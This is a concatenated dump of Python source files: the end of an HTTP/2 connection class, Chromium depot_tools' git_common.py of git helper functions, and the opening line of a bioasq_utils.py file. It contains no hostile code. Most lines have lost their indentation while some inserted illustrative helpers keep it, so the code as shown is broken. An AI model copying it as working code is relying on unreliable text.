# If we get GoAway with error code zero, we are doing a graceful
# shutdown and all is well. Otherwise, throw an exception.
            # If an error occurred, try to read the error description from
# code registry otherwise use the frame's additional data.
error_string = frame._extra_info()
time_cost = time.time() - self.last_recv_time
if frame.additional_data != "session_timed_out":
self.logger.warn("goaway:%s, t:%d", error_string, time_cost)
self.close("GoAway:%s inactive time:%d" % (error_string, time_cost))
elif frame.type == BlockedFrame.type:
self.logger.warn("%s get BlockedFrame", self.ip)
elif frame.type in FRAMES:
# This frame isn't valid at this point.
#raise ValueError("Unexpected frame %s." % frame)
self.logger.error("%s Unexpected frame %s.", self.ip, frame)
else: # pragma: no cover
# Unexpected frames belong to extensions. Just drop it on the
# floor, but log so that users know that something happened.
self.logger.error("%s Received unknown frame, type %d", self.ip, frame.type)
def _update_settings(self, frame):
if SettingsFrame.HEADER_TABLE_SIZE in frame.settings:
new_size = frame.settings[SettingsFrame.HEADER_TABLE_SIZE]
self.remote_settings[SettingsFrame.HEADER_TABLE_SIZE] = new_size
#self.encoder.header_table_size = new_size
if SettingsFrame.INITIAL_WINDOW_SIZE in frame.settings:
newsize = frame.settings[SettingsFrame.INITIAL_WINDOW_SIZE]
oldsize = self.remote_settings[SettingsFrame.INITIAL_WINDOW_SIZE]
delta = newsize - oldsize
for stream in self.streams.values():
stream.remote_window_size += delta
self.remote_settings[SettingsFrame.INITIAL_WINDOW_SIZE] = newsize
if SettingsFrame.SETTINGS_MAX_FRAME_SIZE in frame.settings:
new_size = frame.settings[SettingsFrame.SETTINGS_MAX_FRAME_SIZE]
if not (FRAME_MAX_LEN <= new_size <= FRAME_MAX_ALLOWED_LEN):
self.logger.error("%s Frame size %d is outside of allowed range", self.ip, new_size)
# Tear the connection down with error code PROTOCOL_ERROR
self.close("bad max frame size")
#error_string = ("Advertised frame size %d is outside of range" % (new_size))
#raise ConnectionError(error_string)
return
self.remote_settings[SettingsFrame.SETTINGS_MAX_FRAME_SIZE] = new_size
for stream in self.streams.values():
stream.max_frame_size += new_size
def get_trace(self):
out_list = []
out_list.append(" continue_timeout:%d" % self.continue_timeout)
out_list.append(" processed:%d" % self.processed_tasks)
out_list.append(" h2.stream_num:%d" % len(self.streams))
out_list.append(" sni:%s, host:%s" % (self.ssl_sock.sni, self.ssl_sock.host))
return ",".join(out_list)
def check_active(self, now):
if not self.keep_running or len(self.streams) == 0:
return
if now - self.last_send_time > 3:
self.send_ping()
return
if now - self.last_recv_time > 6:
self.close("active timeout")
        for sid in list(self.streams.keys()):
            try:
                stream = self.streams[sid]
            except KeyError:
                # the stream may have been removed by another thread
                continue
            stream.check_timeout(now)
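# Illustrative sketch (not called anywhere): a minimal reconstruction of the
# PING-based RTT measurement used in receive_frame() above.  The sender packs
# time.time() into the 8-byte PING payload; when the PING+ACK comes back, the
# same payload is unpacked to get the round trip in milliseconds.  The "echo"
# here is simulated locally; in the real code the peer returns the payload.
def _demo_ping_rtt():
    import struct
    import time

    sent_payload = struct.pack("!d", time.time())    # what send_ping() puts on the wire
    echoed_payload = sent_payload                     # peer echoes it back in PING+ACK
    ping_time = struct.unpack("!d", echoed_payload)[0]
    return (time.time() - ping_time) * 1000           # RTT in milliseconds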
|
git_common.py
|
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# Monkeypatch IMapIterator so that Ctrl-C can kill everything properly.
# Derived from https://gist.github.com/aljungberg/626518
from __future__ import print_function
from __future__ import unicode_literals
import multiprocessing.pool
import sys
import threading
from multiprocessing.pool import IMapIterator
def wrapper(func):
def wrap(self, timeout=None):
default_timeout = (1 << 31 if sys.version_info.major == 2 else
threading.TIMEOUT_MAX)
return func(self, timeout=timeout or default_timeout)
return wrap
IMapIterator.next = wrapper(IMapIterator.next)
IMapIterator.__next__ = IMapIterator.next
# TODO(iannucci): Monkeypatch all other 'wait' methods too.
import binascii
import collections
import contextlib
import functools
import logging
import os
import re
import setup_color
import shutil
import signal
import tempfile
import textwrap
import subprocess2
from io import BytesIO
if sys.version_info.major == 2:
# On Python 3, BrokenPipeError is raised instead.
BrokenPipeError = IOError
ROOT = os.path.abspath(os.path.dirname(__file__))
IS_WIN = sys.platform == 'win32'
TEST_MODE = False
def win_find_git():
for elem in os.environ.get('PATH', '').split(os.pathsep):
for candidate in ('git.exe', 'git.bat'):
path = os.path.join(elem, candidate)
if os.path.isfile(path):
return path
raise ValueError('Could not find Git on PATH.')
GIT_EXE = 'git' if not IS_WIN else win_find_git()
FREEZE = 'FREEZE'
FREEZE_SECTIONS = {
'indexed': 'soft',
'unindexed': 'mixed'
}
FREEZE_MATCHER = re.compile(r'%s.(%s)' % (FREEZE, '|'.join(FREEZE_SECTIONS)))
# NOTE: This list is DEPRECATED in favor of the Infra Git wrapper:
# https://chromium.googlesource.com/infra/infra/+/master/go/src/infra/tools/git
#
# New entries should be added to the Git wrapper, NOT to this list. "git_retry"
# is, similarly, being deprecated in favor of the Git wrapper.
#
# ---
#
# Retry a git operation if git returns a error response with any of these
# messages. It's all observed 'bad' GoB responses so far.
#
# This list is inspired/derived from the one in ChromiumOS's Chromite:
# <CHROMITE>/lib/git.py::GIT_TRANSIENT_ERRORS
#
# It was last imported from '7add3ac29564d98ac35ce426bc295e743e7c0c02'.
GIT_TRANSIENT_ERRORS = (
# crbug.com/285832
r'!.*\[remote rejected\].*\(error in hook\)',
# crbug.com/289932
r'!.*\[remote rejected\].*\(failed to lock\)',
# crbug.com/307156
r'!.*\[remote rejected\].*\(error in Gerrit backend\)',
# crbug.com/285832
r'remote error: Internal Server Error',
# crbug.com/294449
r'fatal: Couldn\'t find remote ref ',
# crbug.com/220543
r'git fetch_pack: expected ACK/NAK, got',
# crbug.com/189455
r'protocol error: bad pack header',
# crbug.com/202807
r'The remote end hung up unexpectedly',
# crbug.com/298189
r'TLS packet with unexpected length was received',
# crbug.com/187444
r'RPC failed; result=\d+, HTTP code = \d+',
# crbug.com/388876
r'Connection timed out',
# crbug.com/430343
# TODO(dnj): Resync with Chromite.
r'The requested URL returned error: 5\d+',
r'Connection reset by peer',
r'Unable to look up',
r'Couldn\'t resolve host',
)
GIT_TRANSIENT_ERRORS_RE = re.compile('|'.join(GIT_TRANSIENT_ERRORS),
re.IGNORECASE)
# git's for-each-ref command first supported the upstream:track token in its
# format string in version 1.9.0, but some usages were broken until 2.3.0.
# See git commit b6160d95 for more information.
MIN_UPSTREAM_TRACK_GIT_VERSION = (2, 3)
class BadCommitRefException(Exception):
def __init__(self, refs):
msg = ('one of %s does not seem to be a valid commitref.' %
str(refs))
super(BadCommitRefException, self).__init__(msg)
def memoize_one(**kwargs):
"""Memoizes a single-argument pure function.
Values of None are not cached.
Kwargs:
threadsafe (bool) - REQUIRED. Specifies whether to use locking around
cache manipulation functions. This is a kwarg so that users of memoize_one
are forced to explicitly and verbosely pick True or False.
  Adds the following methods to the decorated function:
* get(key, default=None) - Gets the value for this key from the cache.
* set(key, value) - Sets the value for this key from the cache.
* clear() - Drops the entire contents of the cache. Useful for unittests.
* update(other) - Updates the contents of the cache from another dict.
"""
assert 'threadsafe' in kwargs, 'Must specify threadsafe={True,False}'
threadsafe = kwargs['threadsafe']
if threadsafe:
def withlock(lock, f):
def inner(*args, **kwargs):
with lock:
return f(*args, **kwargs)
return inner
else:
def withlock(_lock, f):
return f
def decorator(f):
# Instantiate the lock in decorator, in case users of memoize_one do:
#
# memoizer = memoize_one(threadsafe=True)
#
# @memoizer
# def fn1(val): ...
#
# @memoizer
# def fn2(val): ...
lock = threading.Lock() if threadsafe else None
cache = {}
_get = withlock(lock, cache.get)
_set = withlock(lock, cache.__setitem__)
@functools.wraps(f)
def inner(arg):
ret = _get(arg)
if ret is None:
ret = f(arg)
if ret is not None:
_set(arg, ret)
return ret
inner.get = _get
inner.set = _set
inner.clear = withlock(lock, cache.clear)
inner.update = withlock(lock, cache.update)
return inner
return decorator
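# Illustrative sketch: a minimal use of memoize_one; 'square' is a made-up
# example function, not part of this module.
def _demo_memoize_one():
  @memoize_one(threadsafe=False)
  def square(x):
    return x * x

  assert square(3) == 9       # computed once...
  assert square.get(3) == 9   # ...then served from the cache
  square.clear()              # the cache can be dropped explicitly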
def _ScopedPool_initer(orig, orig_args): # pragma: no cover
"""Initializer method for ScopedPool's subprocesses.
This helps ScopedPool handle Ctrl-C's correctly.
"""
signal.signal(signal.SIGINT, signal.SIG_IGN)
if orig:
orig(*orig_args)
@contextlib.contextmanager
def ScopedPool(*args, **kwargs):
"""Context Manager which returns a multiprocessing.pool instance which
correctly deals with thrown exceptions.
*args - Arguments to multiprocessing.pool
Kwargs:
kind ('threads', 'procs') - The type of underlying coprocess to use.
**etc - Arguments to multiprocessing.pool
"""
if kwargs.pop('kind', None) == 'threads':
pool = multiprocessing.pool.ThreadPool(*args, **kwargs)
else:
orig, orig_args = kwargs.get('initializer'), kwargs.get('initargs', ())
kwargs['initializer'] = _ScopedPool_initer
kwargs['initargs'] = orig, orig_args
pool = multiprocessing.pool.Pool(*args, **kwargs)
try:
yield pool
pool.close()
except:
pool.terminate()
raise
finally:
pool.join()
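# Illustrative sketch: ScopedPool with thread-backed workers.  The work (len
# over a few strings) is made up for the example; the point is that the pool
# is closed and joined even if the body raises.
def _demo_scoped_pool():
  with ScopedPool(kind='threads') as pool:
    lengths = list(pool.imap(len, ['a', 'bb', 'ccc']))
  return lengths  # -> [1, 2, 3]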
class ProgressPrinter(object):
"""Threaded single-stat status message printer."""
def __init__(self, fmt, enabled=None, fout=sys.stderr, period=0.5):
"""Create a ProgressPrinter.
Use it as a context manager which produces a simple 'increment' method:
with ProgressPrinter('(%%(count)d/%d)' % 1000) as inc:
for i in xrange(1000):
# do stuff
if i % 10 == 0:
inc(10)
Args:
fmt - String format with a single '%(count)d' where the counter value
should go.
enabled (bool) - If this is None, will default to True if
logging.getLogger() is set to INFO or more verbose.
fout (file-like) - The stream to print status messages to.
period (float) - The time in seconds for the printer thread to wait
between printing.
"""
self.fmt = fmt
if enabled is None: # pragma: no cover
self.enabled = logging.getLogger().isEnabledFor(logging.INFO)
else:
self.enabled = enabled
self._count = 0
self._dead = False
self._dead_cond = threading.Condition()
self._stream = fout
self._thread = threading.Thread(target=self._run)
self._period = period
def _emit(self, s):
if self.enabled:
self._stream.write('\r' + s)
self._stream.flush()
def _run(self):
with self._dead_cond:
while not self._dead:
self._emit(self.fmt % {'count': self._count})
self._dead_cond.wait(self._period)
self._emit((self.fmt + '\n') % {'count': self._count})
def inc(self, amount=1):
self._count += amount
def __enter__(self):
self._thread.start()
return self.inc
def __exit__(self, _exc_type, _exc_value, _traceback):
self._dead = True
with self._dead_cond:
self._dead_cond.notifyAll()
self._thread.join()
del self._thread
def once(function):
"""@Decorates |function| so that it only performs its action once, no matter
how many times the decorated |function| is called."""
has_run = [False]
def _wrapper(*args, **kwargs):
if not has_run[0]:
has_run[0] = True
function(*args, **kwargs)
return _wrapper
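# Illustrative sketch: the once() decorator makes every call after the first
# a no-op; 'record' is a made-up example.
def _demo_once():
  calls = []

  @once
  def record():
    calls.append(1)

  record()
  record()
  assert calls == [1]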
def unicode_repr(s):
result = repr(s)
return result[1:] if result.startswith('u') else result
## Git functions
def die(message, *args):
print(textwrap.dedent(message % args), file=sys.stderr)
sys.exit(1)
def blame(filename, revision=None, porcelain=False, abbrev=None, *_args):
command = ['blame']
if porcelain:
command.append('-p')
if revision is not None:
command.append(revision)
if abbrev is not None:
command.append('--abbrev=%d' % abbrev)
command.extend(['--', filename])
return run(*command)
def branch_config(branch, option, default=None):
return get_config('branch.%s.%s' % (branch, option), default=default)
def branch_config_map(option):
"""Return {branch: <|option| value>} for all branches."""
try:
reg = re.compile(r'^branch\.(.*)\.%s$' % option)
lines = get_config_regexp(reg.pattern)
return {reg.match(k).group(1): v for k, v in (l.split() for l in lines)}
except subprocess2.CalledProcessError:
return {}
def branches(use_limit=True, *args):
NO_BRANCH = ('* (no branch', '* (detached', '* (HEAD detached')
key = 'depot-tools.branch-limit'
limit = get_config_int(key, 20)
raw_branches = run('branch', *args).splitlines()
num = len(raw_branches)
if use_limit and num > limit:
die("""\
Your git repo has too many branches (%d/%d) for this tool to work well.
You may adjust this limit by running:
git config %s <new_limit>
You may also try cleaning up your old branches by running:
git cl archive
""", num, limit, key)
for line in raw_branches:
if line.startswith(NO_BRANCH):
continue
yield line.split()[-1]
def get_config(option, default=None):
try:
return run('config', '--get', option) or default
except subprocess2.CalledProcessError:
return default
def get_config_int(option, default=0):
assert isinstance(default, int)
try:
return int(get_config(option, default))
except ValueError:
return default
def get_config_list(option):
try:
return run('config', '--get-all', option).split()
except subprocess2.CalledProcessError:
return []
def get_config_regexp(pattern):
if IS_WIN: # pragma: no cover
# this madness is because we call git.bat which calls git.exe which calls
# bash.exe (or something to that effect). Each layer divides the number of
# ^'s by 2.
pattern = pattern.replace('^', '^' * 8)
return run('config', '--get-regexp', pattern).splitlines()
def current_branch():
try:
return run('rev-parse', '--abbrev-ref', 'HEAD')
except subprocess2.CalledProcessError:
return None
def del_branch_config(branch, option, scope='local'):
del_config('branch.%s.%s' % (branch, option), scope=scope)
def del_config(option, scope='local'):
try:
run('config', '--' + scope, '--unset', option)
except subprocess2.CalledProcessError:
pass
def diff(oldrev, newrev, *args):
return run('diff', oldrev, newrev, *args)
def freeze():
took_action = False
key = 'depot-tools.freeze-size-limit'
MB = 2**20
limit_mb = get_config_int(key, 100)
untracked_bytes = 0
root_path = repo_root()
for f, s in status():
if is_unmerged(s):
die("Cannot freeze unmerged changes!")
if limit_mb > 0:
if s.lstat == '?':
untracked_bytes += os.lstat(os.path.join(root_path, f)).st_size
if limit_mb > 0 and untracked_bytes > limit_mb * MB:
die("""\
You appear to have too much untracked+unignored data in your git
checkout: %.1f / %d MB.
Run `git status` to see what it is.
In addition to making many git commands slower, this will prevent
depot_tools from freezing your in-progress changes.
You should add untracked data that you want to ignore to your repo's
.git/info/exclude
file. See `git help ignore` for the format of this file.
If this data is intended as part of your commit, you may adjust the
freeze limit by running:
git config %s <new_limit>
Where <new_limit> is an integer threshold in megabytes.""",
untracked_bytes / (MB * 1.0), limit_mb, key)
try:
run('commit', '--no-verify', '-m', FREEZE + '.indexed')
took_action = True
except subprocess2.CalledProcessError:
pass
add_errors = False
try:
run('add', '-A', '--ignore-errors')
except subprocess2.CalledProcessError:
add_errors = True
try:
run('commit', '--no-verify', '-m', FREEZE + '.unindexed')
took_action = True
except subprocess2.CalledProcessError:
pass
ret = []
if add_errors:
ret.append('Failed to index some unindexed files.')
if not took_action:
ret.append('Nothing to freeze.')
return ' '.join(ret) or None
def get_branch_tree():
"""Get the dictionary of {branch: parent}, compatible with topo_iter.
Returns a tuple of (skipped, <branch_tree dict>) where skipped is a set of
branches without upstream branches defined.
"""
skipped = set()
branch_tree = {}
for branch in branches():
parent = upstream(branch)
if not parent:
skipped.add(branch)
continue
branch_tree[branch] = parent
return skipped, branch_tree
def get_or_create_merge_base(branch, parent=None):
"""Finds the configured merge base for branch.
If parent is supplied, it's used instead of calling upstream(branch).
"""
base = branch_config(branch, 'base')
base_upstream = branch_config(branch, 'base-upstream')
parent = parent or upstream(branch)
if parent is None or branch is None:
return None
try:
actual_merge_base = run('merge-base', '--fork-point', parent, branch)
except subprocess2.CalledProcessError:
actual_merge_base = run('merge-base', parent, branch)
if base_upstream != parent:
base = None
base_upstream = None
def is_ancestor(a, b):
return run_with_retcode('merge-base', '--is-ancestor', a, b) == 0
if base and base != actual_merge_base:
if not is_ancestor(base, branch):
logging.debug('Found WRONG pre-set merge-base for %s: %s', branch, base)
base = None
elif is_ancestor(base, actual_merge_base):
logging.debug('Found OLD pre-set merge-base for %s: %s', branch, base)
base = None
else:
logging.debug('Found pre-set merge-base for %s: %s', branch, base)
if not base:
base = actual_merge_base
manual_merge_base(branch, base, parent)
return base
def hash_multi(*reflike):
return run('rev-parse', *reflike).splitlines()
def hash_one(reflike, short=False):
args = ['rev-parse', reflike]
if short:
args.insert(1, '--short')
return run(*args)
def in_rebase():
git_dir = run('rev-parse', '--git-dir')
return (
os.path.exists(os.path.join(git_dir, 'rebase-merge')) or
os.path.exists(os.path.join(git_dir, 'rebase-apply')))
def intern_f(f, kind='blob'):
"""Interns a file object into the git object store.
Args:
f (file-like object) - The file-like object to intern
kind (git object type) - One of 'blob', 'commit', 'tree', 'tag'.
Returns the git hash of the interned object (hex encoded).
"""
ret = run('hash-object', '-t', kind, '-w', '--stdin', stdin=f)
f.close()
return ret
def is_dormant(branch):
# TODO(iannucci): Do an oldness check?
return branch_config(branch, 'dormant', 'false') != 'false'
def is_unmerged(stat_value):
return (
'U' in (stat_value.lstat, stat_value.rstat) or
((stat_value.lstat == stat_value.rstat) and stat_value.lstat in 'AD')
)
def manual_merge_base(branch, base, parent):
set_branch_config(branch, 'base', base)
set_branch_config(branch, 'base-upstream', parent)
def mktree(treedict):
"""Makes a git tree object and returns its hash.
See |tree()| for the values of mode, type, and ref.
Args:
treedict - { name: (mode, type, ref) }
"""
with tempfile.TemporaryFile() as f:
for name, (mode, typ, ref) in treedict.items():
f.write(('%s %s %s\t%s\0' % (mode, typ, ref, name)).encode('utf-8'))
f.seek(0)
return run('mktree', '-z', stdin=f)
def parse_commitrefs(*commitrefs):
"""Returns binary encoded commit hashes for one or more commitrefs.
A commitref is anything which can resolve to a commit. Popular examples:
* 'HEAD'
* 'origin/master'
* 'cool_branch~2'
"""
try:
return [binascii.unhexlify(h) for h in hash_multi(*commitrefs)]
except subprocess2.CalledProcessError:
raise BadCommitRefException(commitrefs)
RebaseRet = collections.namedtuple('RebaseRet', 'success stdout stderr')
def rebase(parent, start, branch, abort=False):
"""Rebases |start|..|branch| onto the branch |parent|.
Args:
parent - The new parent ref for the rebased commits.
start - The commit to start from
branch - The branch to rebase
abort - If True, will call git-rebase --abort in the event that the rebase
doesn't complete successfully.
Returns a namedtuple with fields:
success - a boolean indicating that the rebase command completed
successfully.
message - if the rebase failed, this contains the stdout of the failed
rebase.
"""
try:
args = ['--onto', parent, start, branch]
if TEST_MODE:
args.insert(0, '--committer-date-is-author-date')
run('rebase', *args)
return RebaseRet(True, '', '')
except subprocess2.CalledProcessError as cpe:
if abort:
run_with_retcode('rebase', '--abort') # ignore failure
return RebaseRet(False, cpe.stdout.decode('utf-8', 'replace'),
cpe.stderr.decode('utf-8', 'replace'))
def remove_merge_base(branch):
del_branch_config(branch, 'base')
del_branch_config(branch, 'base-upstream')
def repo_root():
"""Returns the absolute path to the repository root."""
return run('rev-parse', '--show-toplevel')
def upstream_default():
"""Returns the default branch name of the origin repository."""
try:
return run('rev-parse', '--abbrev-ref', 'origin/HEAD')
except subprocess2.CalledProcessError:
return 'origin/master'
def root():
return get_config('depot-tools.upstream', upstream_default())
@contextlib.contextmanager
def less(): # pragma: no cover
"""Runs 'less' as context manager yielding its stdin as a PIPE.
Automatically checks if sys.stdout is a non-TTY stream. If so, it avoids
running less and just yields sys.stdout.
The returned PIPE is opened on binary mode.
"""
if not setup_color.IS_TTY:
# On Python 3, sys.stdout doesn't accept bytes, and sys.stdout.buffer must
# be used.
yield getattr(sys.stdout, 'buffer', sys.stdout)
return
# Run with the same options that git uses (see setup_pager in git repo).
# -F: Automatically quit if the output is less than one screen.
# -R: Don't escape ANSI color codes.
# -X: Don't clear the screen before starting.
cmd = ('less', '-FRX')
try:
proc = subprocess2.Popen(cmd, stdin=subprocess2.PIPE)
yield proc.stdin
finally:
try:
proc.stdin.close()
except BrokenPipeError:
# BrokenPipeError is raised if proc has already completed,
pass
proc.wait()
def run(*cmd, **kwargs):
"""The same as run_with_stderr, except it only returns stdout."""
return run_with_stderr(*cmd, **kwargs)[0]
def run_with_retcode(*cmd, **kwargs):
"""Run a command but only return the status code."""
try:
run(*cmd, **kwargs)
return 0
except subprocess2.CalledProcessError as cpe:
return cpe.returncode
def run_stream(*cmd, **kwargs):
"""Runs a git command. Returns stdout as a PIPE (file-like object).
stderr is dropped to avoid races if the process outputs to both stdout and
stderr.
"""
kwargs.setdefault('stderr', subprocess2.VOID)
kwargs.setdefault('stdout', subprocess2.PIPE)
kwargs.setdefault('shell', False)
cmd = (GIT_EXE, '-c', 'color.ui=never') + cmd
proc = subprocess2.Popen(cmd, **kwargs)
return proc.stdout
@contextlib.contextmanager
def run_stream_with_retcode(*cmd, **kwargs):
"""Runs a git command as context manager yielding stdout as a PIPE.
stderr is dropped to avoid races if the process outputs to both stdout and
stderr.
Raises subprocess2.CalledProcessError on nonzero return code.
"""
kwargs.setdefault('stderr', subprocess2.VOID)
kwargs.setdefault('stdout', subprocess2.PIPE)
kwargs.setdefault('shell', False)
cmd = (GIT_EXE, '-c', 'color.ui=never') + cmd
try:
proc = subprocess2.Popen(cmd, **kwargs)
yield proc.stdout
finally:
retcode = proc.wait()
if retcode != 0:
raise subprocess2.CalledProcessError(retcode, cmd, os.getcwd(),
b'', b'')
def run_with_stderr(*cmd, **kwargs):
"""Runs a git command.
Returns (stdout, stderr) as a pair of strings.
kwargs
autostrip (bool) - Strip the output. Defaults to True.
indata (str) - Specifies stdin data for the process.
"""
kwargs.setdefault('stdin', subprocess2.PIPE)
kwargs.setdefault('stdout', subprocess2.PIPE)
kwargs.setdefault('stderr', subprocess2.PIPE)
kwargs.setdefault('shell', False)
autostrip = kwargs.pop('autostrip', True)
indata = kwargs.pop('indata', None)
decode = kwargs.pop('decode', True)
cmd = (GIT_EXE, '-c', 'color.ui=never') + cmd
proc = subprocess2.Popen(cmd, **kwargs)
ret, err = proc.communicate(indata)
retcode = proc.wait()
if retcode != 0:
raise subprocess2.CalledProcessError(retcode, cmd, os.getcwd(), ret, err)
if autostrip:
ret = (ret or b'').strip()
err = (err or b'').strip()
if decode:
ret = ret.decode('utf-8', 'replace')
err = err.decode('utf-8', 'replace')
return ret, err
def set_branch_config(branch, option, value, scope='local'):
set_config('branch.%s.%s' % (branch, option), value, scope=scope)
def set_config(option, value, scope='local'):
run('config', '--' + scope, option, value)
def get_dirty_files():
# Make sure index is up-to-date before running diff-index.
run_with_retcode('update-index', '--refresh', '-q')
return run('diff-index', '--ignore-submodules', '--name-status', 'HEAD')
def is_dirty_git_tree(cmd):
w = lambda s: sys.stderr.write(s+"\n")
dirty = get_dirty_files()
if dirty:
w('Cannot %s with a dirty tree. Commit, freeze or stash your changes first.'
% cmd)
w('Uncommitted files: (git diff-index --name-status HEAD)')
w(dirty[:4096])
if len(dirty) > 4096: # pragma: no cover
w('... (run "git diff-index --name-status HEAD" to see full output).')
return True
return False
def status():
"""Returns a parsed version of git-status.
Returns a generator of (current_name, (lstat, rstat, src)) pairs where:
* current_name is the name of the file
* lstat is the left status code letter from git-status
    * rstat is the right status code letter from git-status
* src is the current name of the file, or the original name of the file
if lstat == 'R'
"""
stat_entry = collections.namedtuple('stat_entry', 'lstat rstat src')
def tokenizer(stream):
acc = BytesIO()
c = None
while c != b'':
c = stream.read(1)
if c in (None, b'', b'\0'):
if len(acc.getvalue()):
yield acc.getvalue()
acc = BytesIO()
else:
acc.write(c)
def parser(tokens):
while True:
try:
status_dest = next(tokens).decode('utf-8')
except StopIteration:
return
stat, dest = status_dest[:2], status_dest[3:]
lstat, rstat = stat
if lstat == 'R':
src = next(tokens).decode('utf-8')
else:
src = dest
yield (dest, stat_entry(lstat, rstat, src))
return parser(tokenizer(run_stream('status', '-z', bufsize=-1)))
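# Illustrative sketch of consuming status(); it shells out to git, so it only
# works inside a checkout and is left here as an uncalled helper.
def _demo_status():
  for name, stat in status():
    if is_unmerged(stat):
      print('unmerged:  %s' % name)
    elif stat.lstat == '?':
      print('untracked: %s' % name)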
def squash_current_branch(header=None, merge_base=None):
header = header or 'git squash commit for %s.' % current_branch()
merge_base = merge_base or get_or_create_merge_base(current_branch())
log_msg = header + '\n'
if log_msg:
log_msg += '\n'
log_msg += run('log', '--reverse', '--format=%H%n%B', '%s..HEAD' % merge_base)
run('reset', '--soft', merge_base)
if not get_dirty_files():
# Sometimes the squash can result in the same tree, meaning that there is
# nothing to commit at this point.
print('Nothing to commit; squashed branch is empty')
return False
run('commit', '--no-verify', '-a', '-F', '-', indata=log_msg.encode('utf-8'))
return True
def tags(*args):
return run('tag', *args).splitlines()
def thaw():
took_action = False
for sha in run_stream('rev-list', 'HEAD').readlines():
sha = sha.strip().decode('utf-8')
    msg = run('show', '--format=%f%b', '-s', sha)
match = FREEZE_MATCHER.match(msg)
if not match:
if not took_action:
return 'Nothing to thaw.'
break
run('reset', '--' + FREEZE_SECTIONS[match.group(1)], sha)
took_action = True
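# Illustrative sketch: freeze()/thaw() round-trip work-in-progress through
# commits whose subjects are matched by FREEZE_MATCHER; a quick check of that
# marker format as defined above.
def _demo_freeze_markers():
  assert FREEZE_MATCHER.match('FREEZE.indexed').group(1) == 'indexed'
  assert FREEZE_MATCHER.match('FREEZE.unindexed').group(1) == 'unindexed'
  assert FREEZE_MATCHER.match('ordinary commit subject') is None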
def topo_iter(branch_tree, top_down=True):
"""Generates (branch, parent) in topographical order for a branch tree.
Given a tree:
A1
B1 B2
C1 C2 C3
D1
branch_tree would look like: {
'D1': 'C3',
'C3': 'B2',
'B2': 'A1',
'C1': 'B1',
'C2': 'B1',
'B1': 'A1',
}
It is OK to have multiple 'root' nodes in your graph.
if top_down is True, items are yielded from A->D. Otherwise they're yielded
from D->A. Within a layer the branches will be yielded in sorted order.
"""
branch_tree = branch_tree.copy()
# TODO(iannucci): There is probably a more efficient way to do these.
if top_down:
while branch_tree:
this_pass = [(b, p) for b, p in branch_tree.items()
if p not in branch_tree]
assert this_pass, "Branch tree has cycles: %r" % branch_tree
for branch, parent in sorted(this_pass):
yield branch, parent
del branch_tree[branch]
else:
parent_to_branches = collections.defaultdict(set)
for branch, parent in branch_tree.items():
parent_to_branches[parent].add(branch)
while branch_tree:
this_pass = [(b, p) for b, p in branch_tree.items()
if not parent_to_branches[b]]
assert this_pass, "Branch tree has cycles: %r" % branch_tree
for branch, parent in sorted(this_pass):
yield branch, parent
parent_to_branches[parent].discard(branch)
del branch_tree[branch]
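# Illustrative sketch: topo_iter over the tree from the docstring above.
# Parents are yielded before children, sorted within each layer.
def _demo_topo_iter():
  tree_map = {
      'D1': 'C3', 'C3': 'B2', 'B2': 'A1',
      'C1': 'B1', 'C2': 'B1', 'B1': 'A1',
  }
  return [b for b, _ in topo_iter(tree_map)]
  # -> ['B1', 'B2', 'C1', 'C2', 'C3', 'D1']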
def tree(treeref, recurse=False):
"""Returns a dict representation of a git tree object.
Args:
treeref (str) - a git ref which resolves to a tree (commits count as trees).
recurse (bool) - include all of the tree's descendants too. File names will
take the form of 'some/path/to/file'.
Return format:
{ 'file_name': (mode, type, ref) }
mode is an integer where:
* 0040000 - Directory
* 0100644 - Regular non-executable file
* 0100664 - Regular non-executable group-writeable file
* 0100755 - Regular executable file
* 0120000 - Symbolic link
* 0160000 - Gitlink
type is a string where it's one of 'blob', 'commit', 'tree', 'tag'.
ref is the hex encoded hash of the entry.
"""
ret = {}
opts = ['ls-tree', '--full-tree']
if recurse:
opts.append('-r')
opts.append(treeref)
try:
for line in run(*opts).splitlines():
mode, typ, ref, name = line.split(None, 3)
ret[name] = (mode, typ, ref)
except subprocess2.CalledProcessError:
return None
return ret
def get_remote_url(remote='origin'):
try:
return run('config', 'remote.%s.url' % remote)
except subprocess2.CalledProcessError:
return None
def upstream(branch):
try:
return run('rev-parse', '--abbrev-ref', '--symbolic-full-name',
branch+'@{upstream}')
except subprocess2.CalledProcessError:
return None
def get_git_version():
"""Returns a tuple that contains the numeric components of the current git
version."""
version_string = run('--version')
version_match = re.search(r'(\d+.)+(\d+)', version_string)
version = version_match.group() if version_match else ''
return tuple(int(x) for x in version.split('.'))
def get_branches_info(include_tracking_status):
format_string = (
'--format=%(refname:short):%(objectname:short):%(upstream:short):')
# This is not covered by the depot_tools CQ which only has git version 1.8.
if (include_tracking_status and
get_git_version() >= MIN_UPSTREAM_TRACK_GIT_VERSION): # pragma: no cover
format_string += '%(upstream:track)'
info_map = {}
data = run('for-each-ref', format_string, 'refs/heads')
BranchesInfo = collections.namedtuple(
'BranchesInfo', 'hash upstream commits behind')
for line in data.splitlines():
(branch, branch_hash, upstream_branch, tracking_status) = line.split(':')
commits = None
base = get_or_create_merge_base(branch)
if base:
commits_list = run('rev-list', '--count', branch, '^%s' % base, '--')
commits = int(commits_list) or None
behind_match = re.search(r'behind (\d+)', tracking_status)
behind = int(behind_match.group(1)) if behind_match else None
info_map[branch] = BranchesInfo(
hash=branch_hash, upstream=upstream_branch, commits=commits,
behind=behind)
# Set None for upstreams which are not branches (e.g empty upstream, remotes
# and deleted upstream branches).
missing_upstreams = {}
for info in info_map.values():
if info.upstream not in info_map and info.upstream not in missing_upstreams:
missing_upstreams[info.upstream] = None
result = info_map.copy()
result.update(missing_upstreams)
return result
def make_workdir_common(repository, new_workdir, files_to_symlink,
files_to_copy, symlink=None):
if not symlink:
symlink = os.symlink
os.makedirs(new_workdir)
for entry in files_to_symlink:
clone_file(repository, new_workdir, entry, symlink)
for entry in files_to_copy:
clone_file(repository, new_workdir, entry, shutil.copy)
def make_workdir(repository, new_workdir):
GIT_DIRECTORY_WHITELIST = [
'config',
'info',
'hooks',
'logs/refs',
'objects',
'packed-refs',
'refs',
'remotes',
'rr-cache',
'shallow',
]
make_workdir_common(repository, new_workdir, GIT_DIRECTORY_WHITELIST,
['HEAD'])
def clone_file(repository, new_workdir, link, operation):
if not os.path.exists(os.path.join(repository, link)):
return
link_dir = os.path.dirname(os.path.join(new_workdir, link))
if not os.path.exists(link_dir):
os.makedirs(link_dir)
src = os.path.join(repository, link)
if os.path.islink(src):
src = os.path.realpath(src)
operation(src, os.path.join(new_workdir, link))
|
bioasq_utils.py
|
import os
